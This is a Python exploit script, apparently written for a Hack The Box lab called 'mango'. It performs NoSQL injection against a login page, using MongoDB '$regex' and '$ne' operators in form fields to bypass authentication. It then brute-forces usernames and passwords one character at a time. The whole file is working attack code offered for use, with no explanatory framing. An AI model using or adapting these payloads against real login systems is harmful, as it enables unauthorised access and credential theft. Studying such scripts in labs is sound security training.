import requests
import string

# globals
PROXIES = {
    'http':'http://127.0.0.1:8080'
}
listOfAlphNum = string.ascii_lowercase+string.ascii_uppercase+str("01234567890")
passList = listOfAlphNum+"*|?+~`!><@#$%^&()-=_][';:/.,"
loginURL = 'http://staging-order.mango.htb/index.php'

def doLogin(data):
    req = requests.post(loginURL, data=data, allow_redirects=False)
    if req.status_code == 302:
        return True

def findInit():
    for i in listOfAlphNum:
        data = {
            'username[$regex]': '^'+i+'.*',
            'password[$ne]': 'admin',
            'login': 'login'
        }

        if(doLogin(data)):
            print("\n[+] found one initial user character! => " + i)
            findUser(i)

def findUser(firstChar):
    user = firstChar
    payload = ""
    while True:
        data = {
            'username[$eq]': user,
            'password[$ne]': 'admin',
            'login': 'login'
        }
        if(doLogin(data)):
            print("Found it ! => ", user)
            print("Moving forward to crack the pasword!")
            findPassword(user)
            break
        for i in listOfAlphNum:
            payload = user + i
            print("\r" + "Testing: " + payload, flush=False, end='')
            data = {
                'username[$regex]': '^' + payload,
                'password[$ne]': 'admin',
                'login': 'login'
            }
            if(doLogin(data)):
                user = payload
                print("\nUsername is now : " + user)
                break

def findPassword(username):
    payload = ""
    password = ""

    while True:
        data = {
            'username[$eq]': username,
            'password[$eq]': password,
            'login': 'login'
        }
        if(doLogin(data)):
            print("Found it ! => ", password)
            print(f"\n[+] username: {username} and password: {password}")
            break
        for i in passList:
            if i in ['.', '?', '*', '^', '+', '|']:
                i = "\\"+i 
            payload = i
            print("\r"+"Testing: " + password + payload, flush=False, end='')
            data = {
                'username[$eq]': username,
                'password[$regex]': '^' + password + payload + '.*',
                'login': 'login'
            }
            if(doLogin(data)):
                password = password + payload
                print(f"\nPassword is now for user {username} : " + password)
                break


if __name__ == '__main__':
    #print("Number of cpu : ", multiprocessing.cpu_count())
    # procs = []
    # proc = Process(target=findInit)
    # procs.append(proc)
    # proc.start()
    # proc.join()
    # jobs = []
    # p = multiprocessing.Process(target=findInit)
    # jobs.append(p)
    # p.start()
    findInit()